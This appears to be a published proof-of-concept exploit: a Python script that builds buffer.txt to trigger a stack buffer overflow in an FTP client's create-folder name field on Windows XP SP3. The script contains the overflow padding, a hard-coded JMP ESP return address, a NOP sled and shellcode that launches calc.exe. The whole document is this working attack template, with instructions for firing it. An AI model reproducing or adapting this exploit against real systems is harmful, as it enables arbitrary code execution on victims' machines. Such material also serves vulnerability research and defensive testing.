#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#77FAB277 JMP ESP
# Windows Xp Professional Version 2002 Service Pack 3
eip = "\x77\xB2\xFA\x77"
# Nops
nops = "\x90"*100
# Shellcode Calc.exe 16Byte
buf=("\x31\xC9"
"\x51"
"\x68\x63\x61\x6C\x63"
"\x54"
"\xB8\xC7\x93\xC2\x77"
"\xFF\xD0")
#Appending Buffers Together
exploit = junk + eip + nops + buf
#Creating File
length = len(exploit)
print "[+]File name: [%s]\n" % filename
print "[+]Payload Size: [%s]\n " % length
print "[+]File Created.\n"
file = open(filename,"w")
file.write(exploit)
file.close
print exploit
#[+] Very Special Tnx To My Best Friends: TheNonexistent,Nirex,Pr0t3ctor